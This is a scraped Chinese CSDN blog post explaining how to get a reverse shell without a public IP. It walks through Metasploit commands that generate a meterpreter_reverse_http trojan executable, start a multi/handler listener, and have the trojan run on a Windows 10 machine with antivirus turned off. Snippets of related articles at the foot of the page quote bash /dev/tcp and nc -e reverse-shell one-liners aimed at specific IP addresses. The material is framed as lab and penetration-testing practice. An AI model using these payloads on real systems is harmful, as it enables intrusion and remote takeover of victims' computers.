无需公网IP反弹shell

最新推荐文章于 2024-09-18 22:00:10 发布

小黑子不会打篮球

最新推荐文章于 2024-09-18 22:00:10 发布

阅读量258

点赞数 3

文章标签： tcp/ip 服务器网络协议网络安全 web安全

本文链接：https://blog.csdn.net/qq_74263993/article/details/141431099

版权

一、准备条件

kali机（网络畅通，具有ipv6地址）

Windows10（关掉病毒实时查杀，尽量别开防火墙）

二、生成木门拿到shell

1.启动kali提权

2.查看自己的ipv6地址

3.设置msfconsole，生成木马

msfconsole
use payload/windows/x64/meterpreter_reverse_http
set LHOST ipv6
set LPORT 4444
# 生成shell
generate -f exe -o shell.exe

4.进行监听

use exploits/multi/handler
set payload windows/x64/meterpreter_reverse_http
set LHOST ipv6
set LPORT 4444
exploit

5.上传木门到Windows10并运行拿到shell

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

小黑子不会打篮球

关注关注

3
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

[ 隧道技术 ] 反弹shell的集中常见方式（一）nc反弹shell

qq_51577576的博客

08-03

1934

攻击者机器 192.168.3.27 和靶机 192.168.3.29 可以相互的访问，这个时候可以使用正向shell攻击者机器 192.168.3.27 不能直接访问靶机，但是靶机 192.168.3.29 可以访问攻击者的机器，这个时候使用反向shell。...

公网IP和内网IP的区别

猫敷雪

12-07

6040

最近在学习shell反弹这块的时候，在向源主机发送报文的时候，由于不了解公网IP和内网IP的区别，导致在监听端口这块一直没有捕获到信息，后来才知道是因为我用的公司的局域网是192开头的，属于内网，因此只能在内部进行通信，而不能与其他网络互连。因为本网络中的保留地址同样也可能被其他网络使用，如果进行网络互连，那么寻找路由时就会因为地址的不唯一而出现问题。因此总结下内网和公网的区别。内网，一般来说，也就是局域网，我们可以把局域网理解成一个小家庭，然后给我们每个家庭的成员都编上号，比如张三是192.168.1.

参与评论您还未登录，请先登录后发表或查看评论

彻底理解bash反弹shell

include_heqile的博客

12-15

2613

bash反弹：首先公网主机监听指定端口，然后肉鸡执行bash命令向公网指定端口发送连接请求公网主机： nc -lvvp 9090 肉鸡执行： bash -i &> /dev/tcp/144.34.164.217/9090 0>&1 其中144.34.164.217为自己的公网主机对命令的解释： bash -i意为创建一个交互式的bash shell &am...

Windows反弹shell测试

oscarli的博客

05-30

365

windows反弹shell测试记录

渗透测试--反弹shell（1）

最新发布

weixin_43520214的博客

09-18

835

反弹shell（Reverse Shell）是一种计算机安全领域的术语，通常出现在讨论网络安全、渗透测试或黑客攻防技术时。它指的是这样一种情况：攻击者首先在自己的机器上监听某个特定的网络端口，然后通过某种手段（例如利用软件漏洞）在目标系统上执行一段代码，这段代码会让目标系统主动连接回攻击者的机器。一旦建立了这个连接，攻击者就可以通过这个连接对目标系统发送命令并接收其输出，从而达到远程控制目标系统的目的。反弹shell与普通（正向）shell的主要区别在于连接的方向。

无公网ip反弹shell

lq22222的博客

10-06

657

因为在kali虚拟上配置的，想要直接在kali虚拟机上面监听，所以内网主机ip地址我们这里选择127.0.0.1，端口任意大数字，我们选择54321，其他都默认，点击确定，这样我们的公网ip就配置好了。相信师傅们在打ctf靶场时都会遇到一个问题，就是部分题目需要一个有公网ip的服务器来反弹shell，但是vps很难找到免费的；这里就给大家推荐一个好用的平台————贝锐花生壳。映射类型选择TCP，映射模板选择SSH服务，然后外网域名下拉就会出现一个随机分配的域名，直接选上即可。此时再看kali终端。

【Try to Hack】无公网ip如何反弹shell

开心星人的博客

06-19

2083

内网kali端口监听进行内网穿透，下载花生壳(免费的)，需要注册才可以下载 https://www.oray.com/ 点击映射数，会跳转到浏览器点击新增映射内网主机为kali的IP 分配了域名和端口打开一个题目传参 s546459d57.zicp.fun 23494为分配的域名和端口反弹shell...

无公网ip反弹shel

m0_52432374的博客

04-30

473

Windows 反弹shell方法

weixin_53747497的博客

07-12

3073

正向shell ：控制端主动发起连接请求去连接被控制端，中间网络链路不存在阻碍。反向shell（反弹shell）：被控端主动发起连接请求去连接控制端，通常被控端由于防火墙限制、权限不足、端口被占用等问题导致被控端不能正常接收发送过来的数据包。

公网实现反弹shell

07-27

举个例子，如果你想在受害机CentOS 7上生成一个反弹shell，连接到宿主机的公网IP地址为10.8.163.224，端口为6666，可以使用以下命令实现端口转发，从而连接到Kali虚拟机上： bash -i >& /dev/tcp/10.8.163.224/6666 ...

经验分享 | 常用linux反弹shell合集

Uguardsec的博客

01-25

996

一、前言当我们拿到一台LINUX主机的权限时，往往都需要反弹到公网的服务器上，一般我们使用bash来反弹的情况居多，但是bash也有失灵的时候。在这种情况下，我们可以尝试使用其他的反弹语句来达到我们的目的。二、反弹方法攻击机:192.168.3.43 靶机:192.168.1.21 、192.168.249.12 1. Bash反弹 1.1 方法一攻击者主机上执行监听： nc -lvvp port 目标主机上执行： bash -i >& /dev/tcp/x.x.x.x/port 0

反弹shell原理与实现

悦分享

08-02

3451

反弹shell（reverse shell），就是控制端监听在某TCP/UDP端口，被控端发起请求到该端口，并将其命令行的输入输出转到控制端。reverse shell与telnet，ssh等标准shell对应，本质上是网络概念的客户端与服务端的角色反转。假设我们攻击了一台机器，打开了该机器的一个端口，攻击者在自己的机器去连接目标机器（目标ip：目标机器端口），这是比较常规的形式，我们叫做正向连接。远程桌面、web服务、ssh、telnet等等都是正向连接。...

网络安全-反弹shell详解（攻击，检测与防御）

2401_84466336的博客

04-23

5449

1.1 什么是 Shell？Shell 在计算机系统中指的是一个用户界面，用于访问操作系统的服务。在网络安全中，攻击者常利用 Shell 来控制受害者的系统。1.2 反弹 Shell 的工作原理反弹 Shell 的基本原理是：攻击者在其自己的机器上设置监听端口，然后诱使受害者的机器执行一个反向连接的 Shell 命令，连接回攻击者的机器。这样，攻击者就能通过这个反向连接执行命令，控制受害者的计算机。

linux反弹shell测试

taxuexunmeixi的专栏

01-21

1287

黑客服务qinc -lvp 9999 服务端可以反弹得到客户端shell,查看客户端内容，所以称之为反弹shell 客户端执行nc 172.21.22.121 9999 -e /bin/bash

内网渗透之Linux反弹shell（综合）

墨鱼菜鸡

09-10

1397

目录知识点 Linux mkfifo命令基本用法 1.首先了解linux命令执行顺序 2.然后了解下管道命令(pipe) 3.常见管道命令 4.mkfifo则可以创建命名管道 Linux标准文件描述符更改标准输出的位置更改标准输入的位置 /dev/null 重定向输入重定向输出重定向管道环境 01NC正向Sh...

渗透测试-Linux反弹shell

lza20001103的博客

05-11

3171

Linux反弹shell

如何用内网虚拟机kali实现反弹shell